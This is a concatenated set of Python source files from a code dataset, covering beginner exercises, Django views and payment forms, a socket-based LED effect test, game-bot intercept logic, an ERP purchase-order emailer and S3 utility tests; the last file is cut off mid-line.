+{"seq_id":"177041675","text":"''' Crie um programa onde 4 jogadores joguem um dado e tenham resultados alestórios. Guarde esses resultados em\num dicionário. No final, coloque esse dicionário em ordem, sabendo que o vencedor tirou o maior número no dado. '''\n\nfrom random import *\nfrom time import *\nfrom operator import *\n\njogadores = dict()\nranking = dict()\ncont = 1\nfor j in range(1, 5):\n jogadores[f'Jogador{j}'] = randint(1, 6)\n\nranking = sorted(jogadores.items(), key=itemgetter(1), reverse=True)\n\nfor k, v in jogadores.items():\n print(f'{k} = {v}')\n sleep(1)\nprint('-=' * 30)\nprint(' == RANKING DOS JOGADORES == ')\nfor k, v in ranking:\n print(f' {cont}º lugar: {k} com {v}.')\n cont += 1\n sleep(1)\n","sub_path":"pythonMundoTres/ex091.py","file_name":"ex091.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"413496810","text":"# A4.py\n# %matplotlib inline\nimport scipy.interpolate, matplotlib.pyplot as plt # For plotting\n\nfrom set_t_values import set_t_values\nfrom construct_pols import construct_pols\n\n# 1. sets the x and y values according to the table above,\nx = [0, .5, 1.1, 1, .2]\ny = [2, 2.5, 2.7, 2, 2.1]\n\n# 2. calls the functions from parts (a) and (b) to find the interpolating polynomials\nt = set_t_values(x, y) # find values of t at which to interpolate\np_x, p_y = construct_pols(x, y, t) # find the interpolating polynomials\n\n# 3. plots the interpolating curve in the plane along with the interpolation points\nt = scipy.linspace(min(t) - .3, max(t) * 1.1) # linespace for x\nplt.plot(x, y, 's', # square points\n p_x(t), p_y(t)) # interpolating curve\nplt.xlabel(\"$x$\")\nplt.ylabel(\"$y$\")\nplt.title(\"Interpolating Curve\")\nplt.legend(['$(x_i,y_i)$', '$(x(t),y(t))=(p_x(t),p_y(t))$'], loc='best')\nplt.show()\n\n# t_spline = scipy.linspace(min(t_i), max(t_i)) # linespace for x cubic, shoots error otherwise\nx_plus2 = x + [0, -.3]\ny_plus2 = y + [2.15, 2.15]\nt_plus2 = set_t_values(x_plus2, y_plus2)\nt = scipy.linspace(min(t_plus2), max(t_plus2)) # linespace for x\np_x_plus2, p_y_plus2 = construct_pols(x_plus2, y_plus2, t_plus2)\n# spline=scipy.interpolate.interp1d(t_i, x, kind='cubic')\nspline_x_plus2 = scipy.interpolate.interp1d(t_plus2, x_plus2, kind='cubic')\nspline_y_plus2 = scipy.interpolate.interp1d(t_plus2, y_plus2, kind='cubic')\n\nwidth, height = 6, 15\n\nplt.figure(figsize=(width, height))\nplt.subplot(311)\nplt.plot(x_plus2, y_plus2, 's', # square points\n p_x_plus2(t), p_y_plus2(t),\n spline_x_plus2(t), spline_y_plus2(t))\nplt.ylabel(\"$y$\")\nplt.legend(['$(x_i,y_i)$', 'Lagrange', 'cubic'],\n bbox_to_anchor=(1, 1),\n loc='best')\nplt.title(\"Interpolation Plots\")\n\nplt.figure(figsize=(width, height))\nplt.subplot(311 + 1)\nplt.plot(x_plus2, y_plus2, 's', # square points\n p_x_plus2(t), p_y_plus2(t))\nplt.ylabel(\"$y$\")\nplt.legend(['', 'Lagrange', 'cubic'],\n bbox_to_anchor=(1, 1),\n loc='best')\n\nplt.figure(figsize=(width, height))\nplt.subplot(311 + 1 + 1)\nplt.plot(x_plus2, y_plus2, 's', # square points\n spline_x_plus2(t), spline_y_plus2(t))\nplt.xlabel(\"$x$\")\nplt.ylabel(\"$y$\")\nplt.legend(['', 'cubic'],\n bbox_to_anchor=(1, 1),\n loc='best')\nplt.tight_layout()\nplt.show()\n","sub_path":"Assignment 4/A4.py","file_name":"A4.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"345835011","text":"from django.shortcuts import render\nfrom .models import Award, Certificate, Projects, Doing, Tools\n# Create your views here.\n\n\ndef resume(request):\n def chk_img(x):\n if x.image:\n return x.image.url\n else:\n return None\n\n data = {\n \"awards\": [\n {\"date\": row.date.isoformat(), \"content\": row.content, \"image\": chk_img(row)}\n for row in Award.objects.all()\n ],\n \"certs\": [\n {\"cert\":row.cert, \"content\": row.content, \"image\": chk_img(row)}\n for row in Certificate.objects.all()\n ],\n\n \"doings\": [\n {\"content\":row.content, \"date\":row.date, \"image\":chk_img(row)}\n for row in Doing.objects.all()\n ],\n \"tools\": [row for row in Tools.objects.all()],\n\n }\n\n return render(request, 'blog/resume.html', {\"data\": data})\n\n\ndef projects(request):\n\n data = [row for row in Projects.objects.all()]\n\n return render(request, 'blog/project.html', {\"data\": data})","sub_path":"resume/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"27826673","text":"\"\"\"\nRainbow light effect unit tests\n\"\"\"\n\nimport socket\nimport threading\n\nimport pytest\n\nfrom hyperion2boblight import BoblightClient, PriorityList\n\nMY_PRIORITY_LIST = PriorityList()\n\nclass TestRainbowEffect:\n \"\"\" Raibow effect test class \"\"\"\n\n @pytest.fixture(scope='module')\n def server(self, request):\n \"\"\" Create a socket which play the server's role to get message from client \"\"\"\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n server_socket.bind((\"localhost\", 19444))\n server_socket.listen(5)\n def end():\n \"\"\" Terminating function \"\"\"\n server_socket.close()\n request.addfinalizer(end)\n return server_socket\n\n @pytest.yield_fixture\n def client(self, request):\n \"\"\" Create the boblight client which will connect to our server socket \"\"\"\n my_priority_list = getattr(request.module, \"MY_PRIORITY_LIST\", None)\n my_priority_list .clear()\n client = BoblightClient(\n (\"localhost\", 19444),\n my_priority_list\n )\n\n client_thread = threading.Thread(target=client.run)\n client_thread.start()\n\n yield client\n\n my_priority_list.put(0, \"quit\")\n client_thread.join()\n\n @pytest.fixture\n def connection(self, request, server, client):\n \"\"\" Actually create server and client and connect them \"\"\"\n connection, _ = server.accept()\n # Receive the hello message\n connection.recv(1024)\n return connection\n\n def test_rainbow_effect(self, connection):\n \"\"\" Test that the rainbow effect actually display each rainbow color \"\"\"\n MY_PRIORITY_LIST.put(1, 'Rainbow')\n # Receive the priority\n connection.recv(1024)\n first_color_message = connection.recv(1024).decode()\n message = \"\"\n # Wait a full iteration of the effect\n while message.find(first_color_message) < 0:\n message = message + connection.recv(1024).decode()\n MY_PRIORITY_LIST.clear()\n # The message must contains command to light every rainbow color\n assert message.find(\"rgb %f %f %f\" % (1., 0., 0.)) != -1 # Red\n assert message.find(\"rgb %f %f %f\" % (1., 1., 0.)) != -1 # Yellow\n assert message.find(\"rgb %f %f %f\" % (0., 1., 0.)) != -1 # Green\n assert message.find(\"rgb %f %f %f\" % (0., 1., 1.)) != -1 # Turquoise\n assert message.find(\"rgb %f %f %f\" % (0., 0., 1.)) != -1 # Blue\n assert message.find(\"rgb %f %f %f\" % (1., 0., 1.)) != -1 # Purple\n\n","sub_path":"hyperion2boblight/tests/test_rainbow_effect.py","file_name":"test_rainbow_effect.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"471642409","text":"# =====================================================================\n# Course: CS219 -- Problem 1 -- Donor List\n# Filename: Problem 1__Problem 1.py\n# Author: \n# Purpose: \tProgram tht creates a multidimensional list of\n# donors and some information. Ability to edit and\n# print the data.\n# =====================================================================\n\n\ndonor_list = list()\n\n\ndef main():\n while True:\n print(\"Select an option:\")\n print(\" (A)dd a new donor\")\n print(\" (E)dit a record\")\n print(\" (L)ook up a record\")\n print(\" (Q)uit Program\")\n\n user_input = input(\"> \")\n\n if user_input == \"Q\":\n break\n elif user_input == \"A\":\n add_data()\n elif user_input == \"E\":\n edit_info()\n elif user_input == \"L\":\n look_up()\n else:\n print(\"Invalid Selection. Try again\\n\")\n\n\ndef add_data():\n # Add Data\n print(\"\\nADD INFORMATION\")\n print(\"How many records would you like to input\")\n num_records = int(input(\"> \"))\n\n while True:\n # Checks for a valid value. Must be an int greater than 0\n if num_records >= 1:\n\n # Check to see if the is any records\n list_len = len(donor_list)\n\n # Creates empty lists in donor_list = num_records\n i = 0\n while i < num_records:\n donor_list.append(list())\n i += 1\n\n j = 1\n # Checks to see if there is an empty list before the records are created\n if list_len == 0:\n while j <= num_records:\n record_num = j - 1\n print(\"\\nRecord Number:\", record_num + 1)\n donor_list[record_num].append(input(\"Name:\"))\n donor_list[record_num].append(input(\"Address:\"))\n donor_list[record_num].append(input(\"Contact:\"))\n j += 1\n else:\n while j <= num_records:\n record_num = list_len\n print(\"\\nRecord Number:\", j)\n donor_list[record_num].append(input(\"Name:\"))\n donor_list[record_num].append(input(\"Address:\"))\n donor_list[record_num].append(input(\"Contact:\"))\n\n j += 1\n list_len += 1\n\n print(\"Created\", i, \"record(s)\\n\")\n break\n elif num_records < 1:\n print(\"Must input at least 1 record\")\n else:\n print(\"Invalid value. Please Try again\")\n\n\ndef edit_info():\n # Edit info\n print(\"EDIT INFORMATION\")\n print(\"Enter the Record you wish to modify\")\n look_up()\n record_num = int(input(\"Record: \")) - 1\n\n print(\"Select which element of the record you wish to modify\")\n print(\"'0' = Name\")\n print(\"'1' = Address\")\n print(\"'2' = Contact\")\n element_num = int(input(\"Element: \"))\n\n while True:\n if element_num == 0:\n donor_list[record_num][element_num] = input(\"Name: \")\n break\n elif element_num == 1:\n donor_list[record_num][element_num] = input(\"Address: \")\n break\n elif element_num == 2:\n donor_list[record_num][element_num] = input(\"Contact: \")\n break\n else:\n print(\"Invalid Selection\")\n\n\ndef look_up():\n print(\"\\nINFO\")\n print(\n \"#\", \" \" * (2 - len(\"#\")),\n \"Name\", \" \" * (15 - len(\"Name\")),\n \"Address\", \" \" * (20 - len(\"Address\")),\n \"Contact\", \" \" * (10 - len(\"Contact\"))\n )\n j = 1\n for i in donor_list:\n if j < 10:\n record = \"0\" + str(j)\n else:\n record = str(j)\n\n print(\n record, \" \" * (2 - len(i)),\n i[0], \" \" * (15 - len(i[0])),\n i[1], \" \" * (20 - len(i[1])),\n i[2], \" \" * (10 - len(i[2])),\n )\n\n j += 1\n\n print(\"\\n\")\n\n\nmain()\n","sub_path":"Problem 1.py","file_name":"Problem 1.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"87550702","text":"from rlutilities.simulation import Car, Ball\r\nfrom rlutilities.mechanics import Aerial\r\nfrom rlutilities.linear_algebra import look_at\r\n\r\nfrom utils.vector_math import *\r\nfrom utils.math import *\r\nfrom utils.misc import *\r\n\r\n\r\nclass Intercept:\r\n def __init__(self, car: Car, ball_predictions, predicate: callable = None, backwards=False):\r\n self.ball: Ball = None\r\n self.is_viable = True\r\n\r\n #find the first reachable ball slice that also meets the predicate\r\n speed = 1000 if backwards else estimate_max_car_speed(car)\r\n # for ball in ball_predictions:\r\n for ball in ball_predictions:\r\n if estimate_time(car, ball.position, speed, -1 if backwards else 1) < ball.time - car.time \\\r\n and (predicate is None or predicate(car, ball)):\r\n self.ball = ball\r\n break\r\n\r\n #if no slice is found, use the last one\r\n if self.ball is None:\r\n if not ball_predictions:\r\n self.ball = Ball()\r\n else:\r\n self.ball = ball_predictions[-1]\r\n self.is_viable = False\r\n\r\n self.time = self.ball.time\r\n self.ground_pos = ground(self.ball.position)\r\n self.position = self.ball.position\r\n\r\nclass AerialIntercept:\r\n def __init__(self, car: Car, ball_predictions, predicate: callable = None):\r\n self.ball: Ball = None\r\n self.is_viable = True\r\n\r\n #find the first reachable ball slice that also meets the predicate\r\n test_car = Car(car)\r\n test_aerial = Aerial(car)\r\n \r\n for ball in ball_predictions:\r\n test_aerial.target = ball.position\r\n test_aerial.arrival_time = ball.time\r\n\r\n # fake our car state :D\r\n dir_to_target = ground_direction(test_car.position, test_aerial.target)\r\n test_car.velocity = dir_to_target * max(norm(test_car.velocity), 1200)\r\n test_car.orientation = look_at(dir_to_target, vec3(0,0,1))\r\n\r\n if test_aerial.is_viable() and (predicate is None or predicate(car, ball)):\r\n self.ball = ball\r\n break\r\n\r\n #if no slice is found, use the last one\r\n if self.ball is None:\r\n self.ball = ball_predictions[-1]\r\n self.is_viable = False\r\n\r\n self.time = self.ball.time\r\n self.ground_pos = ground(self.ball.position)\r\n self.position = self.ball.position\r\n","sub_path":"RLBotPack/BotimusPrime/utils/intercept.py","file_name":"intercept.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"645877029","text":"#!/usr/bin/python\n# coding:utf-8\n\n\n\"\"\"\nCreated on 2017-07-20\n\n@author: Wangchenyang\n\n@userdict: 测试Url接口\n\"\"\"\n\nimport login_Workbench\nimport htmlLogin\nimport print_Encounter\nimport history_Diagnosis\nimport history_OrderMedicines\nimport orderApply\n\n\nclass urlApi(object):\n def testcase(self):\n login_Workbench.login_workbench()\n htmlLogin.patient_info()\n htmlLogin.patient_encounter_info()\n htmlLogin.patient_scale_number()\n htmlLogin.patient_diagnosis_record()\n htmlLogin.patient_attach_number()\n print_Encounter.patient_print_encounter()\n history_Diagnosis.patient_historyDiagnosis()\n history_OrderMedicines.patient_historyOrderMedicines()\n orderApply.order_apply()\n\nif __name__ == '__main__':\n Test = urlApi()\n Test.testcase()","sub_path":"url_Api/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"466182834","text":"# -*- coding: utf-8 -*-\n\ndef count(start=0, step=1, stop=10):\n n = start\n while n <= stop:\n yield n\n n += step\n\nfor x in count(10, 2.5, 20):\n print(x)\n\n# example 1\nclass Count(object):\n def __init__(self, start=0, step=1, stop=10):\n self.n = start\n self.step = step\n self.stop = stop\n \n def __iter__(self):\n return self\n \n def __next__(self):\n n = self.n\n if n > self.stop:\n raise StopIteration()\n self.n += self.step\n return n\n\nfor x in Count(10, 2.5, 20):\n print(x)\n# example 2 \ndef generator():\n \"\"\"This example show that the statement is freeze. It is lazy\"\"\"\n print('Before 1')\n yield 1\n print('After 1')\n print('Before 2')\n yield 2\n print('After 2')\n print('Before 3')\n yield 3\n\ng = generator()\n\nprint('Got %d' % next(g))\nprint('Got %d' % next(g))\nprint('Got %d' % next(g))\n","sub_path":"_generator.py","file_name":"_generator.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"36000109","text":"import pyodbc\nimport pandas as pd\nimport os\nfrom connection.connect_string import *\nfrom email_manager.quickstart import *\n\n\ndef main():\n po_number = input('Inscrire numéro de PO:')\n current_folder = os.path.dirname(os.path.abspath(__file__))\n save_path = \"%s\\\\T%s.xlsx\" % (current_folder, po_number)\n cursor = connect_to_erp()\n df = get_parts_po(cursor, po_number)\n print(df)\n save_to_excel(df, save_path)\n email_po(po_number, \"%s\\\\T%s.xlsx\" % (current_folder, po_number))\n\n\ndef get_parts_po(cursor, po_number):\n cursor.execute('SELECT * FROM P_ORDER_DTL WHERE PO={}'.format(po_number))\n column_title = ['NUMERO', 'DESCRIPTION', 'QTY']\n parts_no = []\n descriptions = []\n qantites = []\n for row in cursor:\n # print(\"%s, %s, %s\" % (row[3], row[5], int(row[6])))\n parts_no.append(row[3])\n descriptions.append(row[5])\n qantites.append(row[6])\n # print('\\n')\n return pd.DataFrame({column_title[0]: parts_no, column_title[1]: descriptions, column_title[2]: qantites})\n\n\ndef save_to_excel(df, save_path):\n writer = pd.ExcelWriter(save_path)\n df.to_excel(writer, sheet_name='sheet11', index=False)\n writer.save()\n\n\ndef connect_to_erp():\n cnxn = pyodbc.connect(connect_string())\n return cnxn.cursor()\n\n\ndef email_po(po_number, file):\n service = create_service()\n # results = service.users().labels().list(userId='me').execute()\n # labels = results.get('labels', [])\n\n # if not labels:\n # print('No labels found.')\n # else:\n # print('Labels:')\n # for label in labels:\n # print(label['name'])\n message = create_message_with_attachment('abechard@centreidnov.com',\n 'abechard@centreidnov.com',\n \"Commande PO#%s\" % po_number,\n \"Bonjour\\nVoici des pièces à produire\",\n file)\n #send_message(service, 'me', message)\n\n\nif __name__ == '__main__':\n # execute only if run as the entry point into the program\n main()\n","sub_path":"send_po_excel/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"135349655","text":"import functools\nimport json\n\nfrom django import forms\nfrom django.conf import settings\nfrom django.core.files.base import ContentFile\nfrom django.db import transaction\nfrom django.db.models.fields.files import FieldFile\nfrom django.utils.translation import gettext_lazy as _\nfrom django_file_form.forms import FileFormMixin\n\nfrom hypha.apply.stream_forms.fields import MultiFileField, SingleFileField\n\nfrom ..models.payment import (\n CHANGES_REQUESTED,\n DECLINED,\n PAID,\n REQUEST_STATUS_CHOICES,\n SUBMITTED,\n UNDER_REVIEW,\n Invoice,\n PaymentReceipt,\n PaymentRequest,\n SupportingDocument,\n)\nfrom ..models.project import PacketFile\n\n\ndef filter_choices(available, choices):\n return [(k, v) for k, v in available if k in choices]\n\n\nfilter_request_choices = functools.partial(filter_choices, REQUEST_STATUS_CHOICES)\n\n\nclass ChangePaymentRequestStatusForm(forms.ModelForm):\n name_prefix = 'change_payment_request_status_form'\n\n class Meta:\n fields = ['status', 'comment', 'paid_value']\n model = PaymentRequest\n\n def __init__(self, instance, *args, **kwargs):\n super().__init__(instance=instance, *args, **kwargs)\n\n self.initial['paid_value'] = self.instance.requested_value\n\n status_field = self.fields['status']\n\n possible_status_transitions_lut = {\n CHANGES_REQUESTED: filter_request_choices([DECLINED]),\n SUBMITTED: filter_request_choices([CHANGES_REQUESTED, UNDER_REVIEW, DECLINED]),\n UNDER_REVIEW: filter_request_choices([PAID]),\n }\n status_field.choices = possible_status_transitions_lut.get(instance.status, [])\n\n if instance.status != UNDER_REVIEW:\n del self.fields['paid_value']\n\n def clean(self):\n cleaned_data = super().clean()\n status = cleaned_data['status']\n paid_value = cleaned_data.get('paid_value')\n\n if paid_value and status != PAID:\n self.add_error('paid_value', _('You can only set a value when moving to the Paid status.'))\n return cleaned_data\n\n\nclass ChangeInvoiceStatusForm(forms.ModelForm):\n name_prefix = 'change_invoice_status_form'\n\n class Meta:\n fields = ['status', 'comment', 'paid_value']\n model = Invoice\n\n def __init__(self, instance, *args, **kwargs):\n super().__init__(instance=instance, *args, **kwargs)\n\n self.initial['paid_value'] = self.instance.amount\n\n status_field = self.fields['status']\n\n possible_status_transitions_lut = {\n CHANGES_REQUESTED: filter_request_choices([DECLINED]),\n SUBMITTED: filter_request_choices([CHANGES_REQUESTED, UNDER_REVIEW, DECLINED]),\n UNDER_REVIEW: filter_request_choices([PAID]),\n }\n status_field.choices = possible_status_transitions_lut.get(instance.status, [])\n\n if instance.status != UNDER_REVIEW:\n del self.fields['paid_value']\n\n def clean(self):\n cleaned_data = super().clean()\n status = cleaned_data['status']\n paid_value = cleaned_data.get('paid_value')\n\n if paid_value and status != PAID:\n self.add_error('paid_value', _('You can only set a value when moving to the Paid status.'))\n return cleaned_data\n\n\nclass PaymentRequestBaseForm(forms.ModelForm):\n class Meta:\n fields = ['requested_value', 'invoice', 'date_from', 'date_to']\n model = PaymentRequest\n widgets = {\n 'date_from': forms.DateInput,\n 'date_to': forms.DateInput,\n }\n labels = {\n 'requested_value': _('Requested Value ({currency})').format(currency=settings.CURRENCY_SYMBOL)\n }\n\n def __init__(self, user=None, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['requested_value'].widget.attrs['min'] = 0\n\n def clean(self):\n cleaned_data = super().clean()\n date_from = cleaned_data['date_from']\n date_to = cleaned_data['date_to']\n\n if date_from > date_to:\n self.add_error('date_from', _('Date From must be before Date To'))\n\n return cleaned_data\n\n\nclass CreatePaymentRequestForm(FileFormMixin, PaymentRequestBaseForm):\n receipts = MultiFileField(required=False)\n\n def save(self, commit=True):\n request = super().save(commit=commit)\n\n receipts = self.cleaned_data['receipts'] or []\n\n PaymentReceipt.objects.bulk_create(\n PaymentReceipt(payment_request=request, file=receipt)\n for receipt in receipts\n )\n\n return request\n\n\nclass InvoiceBaseForm(forms.ModelForm):\n class Meta:\n fields = ['date_from', 'date_to', 'amount', 'document', 'message_for_pm']\n model = Invoice\n widgets = {\n 'date_from': forms.DateInput,\n 'date_to': forms.DateInput,\n }\n\n def __init__(self, user=None, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['amount'].widget.attrs['min'] = 0\n\n def clean(self):\n cleaned_data = super().clean()\n date_from = cleaned_data['date_from']\n date_to = cleaned_data['date_to']\n\n if date_from > date_to:\n self.add_error('date_from', _('Date From must be before Date To'))\n\n return cleaned_data\n\n\nclass CreateInvoiceForm(FileFormMixin, InvoiceBaseForm):\n document = SingleFileField(label='Invoice File', required=True)\n supporting_documents = MultiFileField(\n required=False,\n help_text=_('Files that are related to the invoice. They could be xls, microsoft office documents, open office documents, pdfs, txt files.')\n )\n\n field_order = ['date_from', 'date_to', 'amount', 'document', 'supporting_documents', 'message_for_pm']\n\n def save(self, commit=True):\n invoice = super().save(commit=commit)\n\n supporting_documents = self.cleaned_data['supporting_documents'] or []\n\n SupportingDocument.objects.bulk_create(\n SupportingDocument(invoice=invoice, document=document)\n for document in supporting_documents\n )\n\n return invoice\n\n\nclass EditPaymentRequestForm(FileFormMixin, PaymentRequestBaseForm):\n receipt_list = forms.ModelMultipleChoiceField(\n widget=forms.CheckboxSelectMultiple(attrs={'class': 'delete'}),\n queryset=PaymentReceipt.objects.all(),\n required=False,\n label=_('Receipts')\n )\n receipts = MultiFileField(label='', required=False)\n\n def __init__(self, user=None, instance=None, *args, **kwargs):\n super().__init__(*args, instance=instance, **kwargs)\n\n self.fields['receipt_list'].queryset = instance.receipts.all()\n\n self.fields['requested_value'].label = 'Value'\n\n @transaction.atomic\n def save(self, commit=True):\n request = super().save(commit=commit)\n\n removed_receipts = self.cleaned_data['receipt_list']\n\n removed_receipts.delete()\n\n to_add = self.cleaned_data['receipts']\n if to_add:\n PaymentReceipt.objects.bulk_create(\n PaymentReceipt(payment_request=request, file=receipt)\n for receipt in to_add\n )\n return request\n\n\nclass EditInvoiceForm(FileFormMixin, InvoiceBaseForm):\n document = SingleFileField(label=_('Invoice File'), required=True)\n supporting_documents = MultiFileField(required=False)\n\n field_order = ['date_from', 'date_to', 'amount', 'document', 'supporting_documents', 'message_for_pm']\n\n @transaction.atomic\n def save(self, commit=True):\n invoice = super().save(commit=commit)\n not_deleted_original_filenames = [\n file['name'] for file in json.loads(self.cleaned_data['supporting_documents-uploads'])\n ]\n for f in invoice.supporting_documents.all():\n if f.document.name not in not_deleted_original_filenames:\n f.document.delete()\n f.delete()\n\n for f in self.cleaned_data[\"supporting_documents\"]:\n if not isinstance(f, FieldFile):\n try:\n SupportingDocument.objects.create(invoice=invoice, document=f)\n finally:\n f.close()\n return invoice\n\n\nclass SelectDocumentForm(forms.ModelForm):\n document = forms.ChoiceField(\n label=\"Document\",\n widget=forms.Select(attrs={'id': 'from_submission'})\n )\n\n class Meta:\n model = PacketFile\n fields = ['category', 'document']\n\n def __init__(self, existing_files, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.files = existing_files\n\n choices = [(f.url, f.filename) for f in self.files]\n\n self.fields['document'].choices = choices\n\n def clean_document(self):\n file_url = self.cleaned_data['document']\n for file in self.files:\n if file.url == file_url:\n new_file = ContentFile(file.read())\n new_file.name = file.filename\n return new_file\n raise forms.ValidationError(_('File not found on submission'))\n\n @transaction.atomic()\n def save(self, *args, **kwargs):\n return super().save(*args, **kwargs)\n","sub_path":"hypha/apply/projects/forms/payment.py","file_name":"payment.py","file_ext":"py","file_size_in_byte":9139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"189310400","text":"import boto3\nimport json\nimport pytest\n\nfrom tempfile import NamedTemporaryFile\nfrom moto import mock_s3\nfrom mozetl.taar import taar_utils\n\nSAMPLE_DATA = {\"test\": \"data\"}\n\nFAKE_AMO_DUMP = {\n \"test-guid-0001\": {\n \"name\": {\"en-US\": \"test-amo-entry-1\"},\n \"default_locale\": \"en-US\",\n \"current_version\": {\n \"files\": [\n {\n \"status\": \"public\",\n \"platform\": \"all\",\n \"id\": 1,\n \"is_webextension\": True,\n }\n ]\n },\n \"guid\": \"test-guid-0001\",\n },\n \"test-guid-0002\": {\n \"name\": {\"en-US\": \"test-amo-entry-2\"},\n \"default_locale\": \"en-US\",\n \"current_version\": {\n \"files\": [\n {\n \"status\": \"public\",\n \"platform\": \"all\",\n \"id\": 2,\n \"is_webextension\": False,\n }\n ]\n },\n \"guid\": \"test-guid-0002\",\n },\n}\n\n\n@mock_s3\ndef test_read_from_s3():\n # Write a JSON blob\n bucket = \"test-bucket\"\n prefix = \"test-prefix/\"\n s3_json_fname = \"test.json\"\n\n conn = boto3.resource(\"s3\", region_name=\"us-west-2\")\n conn.create_bucket(\n Bucket=bucket,\n CreateBucketConfiguration={\n \"LocationConstraint\": \"us-west-2\",\n },\n )\n\n with NamedTemporaryFile(\"w\") as json_file:\n json.dump(SAMPLE_DATA, json_file)\n # Seek to the beginning of the file to allow the tested\n # function to find the file content.\n json_file.seek(0)\n # Upload the temp file to S3.\n taar_utils.write_to_s3(json_file.name, s3_json_fname, prefix, bucket)\n\n data = taar_utils.read_from_s3(s3_json_fname, prefix, bucket)\n assert data == SAMPLE_DATA\n\n\n@mock_s3\ndef test_write_to_s3():\n bucket = \"test-bucket\"\n prefix = \"test-prefix/\"\n dest_filename = \"test.json\"\n\n conn = boto3.resource(\"s3\", region_name=\"us-west-2\")\n bucket_obj = conn.create_bucket(\n Bucket=bucket,\n CreateBucketConfiguration={\n \"LocationConstraint\": \"us-west-2\",\n },\n )\n\n with NamedTemporaryFile(\"w\") as json_file:\n json.dump(SAMPLE_DATA, json_file)\n # Seek to the beginning of the file to allow the tested\n # function to find the file content.\n json_file.seek(0)\n # Upload the temp file to S3.\n taar_utils.write_to_s3(json_file.name, dest_filename, prefix, bucket)\n\n available_objects = list(bucket_obj.objects.filter(Prefix=prefix))\n assert len(available_objects) == 1\n\n # Check that our file is there.\n full_s3_name = \"{}{}\".format(prefix, dest_filename)\n keys = [o.key for o in available_objects]\n assert full_s3_name in keys\n\n stored_data = taar_utils.read_from_s3(dest_filename, prefix, bucket)\n assert SAMPLE_DATA == stored_data\n\n\n@mock_s3\ndef test_write_json_s3():\n bucket = \"test-bucket\"\n prefix = \"test-prefix/\"\n base_filename = \"test\"\n\n content = {\"it-IT\": [\"firefox@getpocket.com\"]}\n\n conn = boto3.resource(\"s3\", region_name=\"us-west-2\")\n bucket_obj = conn.create_bucket(\n Bucket=bucket,\n CreateBucketConfiguration={\n \"LocationConstraint\": \"us-west-2\",\n },\n )\n\n # Store the data in the mocked bucket.\n taar_utils.store_json_to_s3(\n json.dumps(content), base_filename, \"20171106\", prefix, bucket\n )\n\n # Get the content of the bucket.\n available_objects = list(bucket_obj.objects.filter(Prefix=prefix))\n assert len(available_objects) == 2\n\n # Get the list of keys.\n keys = [o.key for o in available_objects]\n assert \"{}{}.json\".format(prefix, base_filename) in keys\n date_filename = \"{}{}20171106.json\".format(prefix, base_filename)\n assert date_filename in keys\n\n\n@mock_s3\ndef test_load_amo_external_whitelist():\n conn = boto3.resource(\"s3\", region_name=\"us-west-2\")\n conn.create_bucket(\n Bucket=taar_utils.AMO_DUMP_BUCKET,\n CreateBucketConfiguration={\n \"LocationConstraint\": \"us-west-2\",\n },\n )\n\n # Make sure that whitelist loading fails before mocking the S3 file.\n EXCEPTION_MSG = \"Empty AMO whitelist detected\"\n with pytest.raises(RuntimeError) as excinfo:\n taar_utils.load_amo_external_whitelist()\n\n assert EXCEPTION_MSG in str(excinfo.value)\n\n # Store an empty file and verify that an exception is raised.\n conn.Object(taar_utils.AMO_DUMP_BUCKET, key=taar_utils.AMO_WHITELIST_KEY).put(\n Body=json.dumps({})\n )\n\n with pytest.raises(RuntimeError) as excinfo:\n taar_utils.load_amo_external_whitelist()\n\n assert EXCEPTION_MSG in str(excinfo.value)\n\n # Store the data in the mocked bucket.\n conn.Object(taar_utils.AMO_DUMP_BUCKET, key=taar_utils.AMO_WHITELIST_KEY).put(\n Body=json.dumps(FAKE_AMO_DUMP)\n )\n\n # Check that the web_extension item is still present\n # and the legacy addon is absent.\n whitelist = taar_utils.load_amo_external_whitelist()\n assert \"this_guid_can_not_be_in_amo\" not in whitelist\n\n # Verify that the legacy addon was removed while the\n # web_extension compatible addon is still present.\n assert \"test-guid-0001\" in whitelist\n assert \"test-guid-0002\" not in whitelist\n\n\ndef test_telemetry_hash():\n \"\"\"\n A JS snippet that will run in the Browser Toolbox is:\n\n let byteArr = new TextEncoder().encode(\"33c5c416-c57d-4eb7-bf58-beaf97a40332\")\n const CryptoHash = Components.Constructor(\"@mozilla.org/security/hash;1\",\n \"nsICryptoHash\",\n \"initWithString\");\n let hash = new CryptoHash(\"sha256\");\n hash.update(byteArr, byteArr.length);\n let clientId = CommonUtils.bytesAsHex(hash.finish(false));\n \"54e760dc799b24c6edc1a02b200db9b07d51a96b7dc7d4ebcd1d86ee8728f420\"\n \"\"\"\n\n uuid = \"33c5c416-c57d-4eb7-bf58-beaf97a40332\"\n hashed_id = taar_utils.hash_telemetry_id(uuid)\n assert (\n hashed_id == \"54e760dc799b24c6edc1a02b200db9b07d51a96b7dc7d4ebcd1d86ee8728f420\"\n 